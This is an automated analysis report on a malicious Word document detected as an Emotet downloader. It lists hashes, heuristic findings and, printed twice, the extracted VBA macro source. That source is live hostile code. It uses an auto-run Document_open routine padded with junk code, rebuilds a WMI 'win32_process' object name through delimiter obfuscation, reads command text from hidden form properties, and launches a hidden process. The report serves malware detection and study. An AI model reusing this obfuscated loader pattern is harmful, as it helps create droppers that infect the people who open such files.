Office (OLE) malware analysis — malicious · 5f1d9dff136888c7

MALICIOUS

Office (OLE)

203.6 KB Created: 2020-02-05 23:04:00 Authoring application: Microsoft Office Word First seen: 2020-05-14

MD5: 7ecfbb57c47106ca51582ebcf44baa17 SHA-1: bf174c257bcd9a6142f7eafa7c2227b0088a935b SHA-256: 5f1d9dff136888c71d8b157e91821d73a94faa92af1bdc04912d223b7b1de32d

230 Risk Score

Heuristics 7

ClamAV: Doc.Downloader.Emotet-7577854-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-7577854-0
VBA macros detected medium 4 related findings OLE_VBA_MACROS

Document contains VBA macro code
VBA UserForm hidden-property command stager critical OLE_VBA_USERFORM_HIDDEN_COMMAND_STAGER

VBA auto-exec macro creates a COM object from a decoded variable and reconstructs command text through Split/Join and hidden UserForm properties such as ControlTipText, Tag, Pages, or HelpContextId. This is a high-confidence macro downloader/loader shape seen in the reviewed OLE set, but it is not an Office CVE exploit primitive.
Matched line in script
```
Hkhoufmlku = VBA.CVar(Join(Split(Skfqtnifjm, "}&*$**(){"), NoLineBreakAfter))
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set Flsbxhezmrb = CreateObject(Yebclctzuwq)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
Document_Open macro low OLE_VBA_DOCOPEN

Document_Open macro
Matched line in script
```
Private Sub Document_open()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12085 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12085 bytes
SHA-256: `994ea56a48fe2ff6cd951144611e909c3720ce519ebb13fb1bf489d8806ca19c`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "Sxblahoiifi" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_open() If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Xrdxrachwrpx.Efgerzpvecu End Sub Attribute VB_Name = "Negooxrrapdb" Attribute VB_Base = "0{45AF52AB-9294-4946-8357-EDACE6A1ED7D}{AE1CF388-5BB9-4943-A204-B0E4BA3F77F5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Attribute VB_Name = "Bynjtkvddapu" Attribute VB_Base = "0{CB4093BD-136B-40C6-A790-D82AEC6A967F}{1DB8765B-107C-4342-95FE-186FAE706F83}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Eqyypbif() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Daomvfsfjwqkd" Attribute VB_Base = "0{444E6D10-88AC-43B6-9C78-4DE2F9F3BEA4}{36C5A844-4EB9-46B2-B432-30B5908506AE}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Nfkiyffx() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Bjfjbjvcofsw" Attribute VB_Base = "0{48CB2543-8171-4458-9314-1C6F730D23E8}{0C941EFF-B940-4DA3-B988-AF18C410E671}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Yikkxltmj() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Wyxxuydt" Attribute VB_Base = "0{53409A6D-1205-4E3F-842F-9AB8E99BB23D}{BF39780A-168F-4666-BC29-E456412C5C75}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Wnvimuipjirw() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Pvuaizpaih" Attribute VB_Base = "0{166B1351-0A3E-431D-B02B-4467B7A18DCC}{20BEE670-C3A0-4E22-B835-5CC278177759}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Xftgpcoocv() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Krkwzolz" Attribute VB_Base = "0{6AA91EAD-3A2D-47C5-A770-1192A6CE984B}{59AABF50-2981-4904-B84C-86A21D21FBA9}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Hzecluewfod() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Cwcsoiohugrpr" Attribute VB_Base = "0{037F13AC-CC4E-4DBB-91C2-75A214DE75DF}{A9582D68-DC81-4D08-A33F-01C329CC5343}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = False Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Sub Atwfqkxucmqu() Debug.Print "NXBUWWD" + DDD + "pOLON" End Sub Attribute VB_Name = "Xrdxrachwrpx" Function Efgerzpvecu() If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Qpwdcfvjyr = "}&$(){}&$*(){w}&$*(){i}&$*(){}&$*(){n}&$*(){m}&$*(){g}&$*(){}&$*(){mt}&$*(){}&$*(){" + ChrW(Negooxrrapdb.Zoom + 10 + 5) + ":}&$*(){wi}&$*(){}&$*(){n3}&$*(){}&$*(){}&$*(){2}&$*(){}&$*(){_}&$*(){}&$*(){" + Negooxrrapdb.Klkjcjzh + "r}&$*(){}&$*(){o}&$*(){ce}&$*(){s}&$*(){}&$*(){s}&$*(){" If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Yebclctzuwq = Hkhoufmlku(Qpwdcfvjyr) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Set Flsbxhezmrb = CreateObject(Yebclctzuwq) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Yallfkyfeli = Negooxrrapdb.Pavzxnaxfvgu.Tag If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Zupiezamexktk = Yebclctzuwq + ChrW(Negooxrrapdb.Zoom + 15) + Negooxrrapdb.Hshzuaxonfpp.Tag + Yallfkyfeli If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Jpbqzocatslsh = Zupiezamexktk + Negooxrrapdb.Klkjcjzh If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Set Qcuapsgs = Wompiupyggta(Jpbqzocatslsh) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Call Flsbxhezmrb. _ Create(khknasas + Clmffidfqkk + nbswe, Cskozrrdjc, Qcuapsgs) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 End Function Function Wompiupyggta(Yqzdsrstnxxow) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Set Wompiupyggta = CreateObject(Yqzdsrstnxxow) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Wompiupyggta. _ showwindow = Lbnxapjhcmbb + Xzgmtjfembrl If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 End Function Function Hkhoufmlku(Skfqtnifjm) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Hkhoufmlku = VBA.CVar(Join(Split(Skfqtnifjm, "}&$*(){"), NoLineBreakAfter)) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 End Function Function Clmffidfqkk() If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 nnannauwe = "}&$*(){ }&$*(){-}&$*(){e}&$*(){ }&$**(){" If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Bczvznvjp = ChrW(Int(wdKeyP)) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Ruvtgtqjujxaw = Bczvznvjp + Negooxrrapdb.Pjfyvvzebdvoo.ControlTipText + nnannauwe If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 dkhiqwhnkew = Negooxrrapdb.Gdewqoxmwyilf.Pages(0).Caption If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 Clmffidfqkk = Hkhoufmlku(Ruvtgtqjujxaw + StrReverse(dkhiqwhnkew)) If 954823 <> 921852 Then PPsHdEiCQI = 954823 + 1989 zZvINqIOhf = 921852 - 2013 Else MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf)) End If If 652876 <> 638715 Then kCaNMHSLoI = 652876 + 1989 wotfNMaeGj = 638715 - 2013 Else MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj)) End If tsLoloMiuj = "NrcsBxBsra" aBVWmdVFlU = 675836 End Function

SHA-256: 994ea56a48fe2ff6cd951144611e909c3720ce519ebb13fb1bf489d8806ca19c

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "Sxblahoiifi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Xrdxrachwrpx.Efgerzpvecu
End Sub

Attribute VB_Name = "Negooxrrapdb"
Attribute VB_Base = "0{45AF52AB-9294-4946-8357-EDACE6A1ED7D}{AE1CF388-5BB9-4943-A204-B0E4BA3F77F5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Bynjtkvddapu"
Attribute VB_Base = "0{CB4093BD-136B-40C6-A790-D82AEC6A967F}{1DB8765B-107C-4342-95FE-186FAE706F83}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Eqyypbif()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Daomvfsfjwqkd"
Attribute VB_Base = "0{444E6D10-88AC-43B6-9C78-4DE2F9F3BEA4}{36C5A844-4EB9-46B2-B432-30B5908506AE}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Nfkiyffx()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Bjfjbjvcofsw"
Attribute VB_Base = "0{48CB2543-8171-4458-9314-1C6F730D23E8}{0C941EFF-B940-4DA3-B988-AF18C410E671}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Yikkxltmj()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Wyxxuydt"
Attribute VB_Base = "0{53409A6D-1205-4E3F-842F-9AB8E99BB23D}{BF39780A-168F-4666-BC29-E456412C5C75}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Wnvimuipjirw()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Pvuaizpaih"
Attribute VB_Base = "0{166B1351-0A3E-431D-B02B-4467B7A18DCC}{20BEE670-C3A0-4E22-B835-5CC278177759}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Xftgpcoocv()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Krkwzolz"
Attribute VB_Base = "0{6AA91EAD-3A2D-47C5-A770-1192A6CE984B}{59AABF50-2981-4904-B84C-86A21D21FBA9}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Hzecluewfod()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Cwcsoiohugrpr"
Attribute VB_Base = "0{037F13AC-CC4E-4DBB-91C2-75A214DE75DF}{A9582D68-DC81-4D08-A33F-01C329CC5343}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Atwfqkxucmqu()
Debug.Print "NXBUWWD" + DDD + "pOLON"
End Sub

Attribute VB_Name = "Xrdxrachwrpx"
Function Efgerzpvecu()
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Qpwdcfvjyr = "}&*$**(){}&*$**(){w}&*$**(){i}&*$**(){}&*$**(){n}&*$**(){m}&*$**(){g}&*$**(){}&*$**(){mt}&*$**(){}&*$**(){" + ChrW(Negooxrrapdb.Zoom + 10 + 5) + ":}&*$**(){wi}&*$**(){}&*$**(){n3}&*$**(){}&*$**(){}&*$**(){2}&*$**(){}&*$**(){_}&*$**(){}&*$**(){" + Negooxrrapdb.Klkjcjzh + "r}&*$**(){}&*$**(){o}&*$**(){ce}&*$**(){s}&*$**(){}&*$**(){s}&*$**(){"
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Yebclctzuwq = Hkhoufmlku(Qpwdcfvjyr)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Set Flsbxhezmrb = CreateObject(Yebclctzuwq)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Yallfkyfeli = Negooxrrapdb.Pavzxnaxfvgu.Tag
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Zupiezamexktk = Yebclctzuwq + ChrW(Negooxrrapdb.Zoom + 15) + Negooxrrapdb.Hshzuaxonfpp.Tag + Yallfkyfeli
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Jpbqzocatslsh = Zupiezamexktk + Negooxrrapdb.Klkjcjzh
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Set Qcuapsgs = Wompiupyggta(Jpbqzocatslsh)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Call Flsbxhezmrb. _
Create(khknasas + Clmffidfqkk + nbswe, Cskozrrdjc, Qcuapsgs)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
End Function
Function Wompiupyggta(Yqzdsrstnxxow)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Set Wompiupyggta = CreateObject(Yqzdsrstnxxow)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
Wompiupyggta. _
showwindow = Lbnxapjhcmbb + Xzgmtjfembrl
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
End Function
Function Hkhoufmlku(Skfqtnifjm)
   If 954823 <> 921852 Then
PPsHdEiCQI = 954823 + 1989
zZvINqIOhf = 921852 - 2013
Else
MsgBox (CStr(PPsHdEiCQI) & CStr(zZvINqIOhf))
End If
If 652876 <> 638715 Then
kCaNMHSLoI = 652876 + 1989
wotfNMaeGj = 638715 - 2013
Else
MsgBox (CStr(kCaNMHSLoI) & CStr(wotfNMaeGj))
End If
tsLoloMiuj = "NrcsBxBsra"
aBVWmdVFlU = 675836
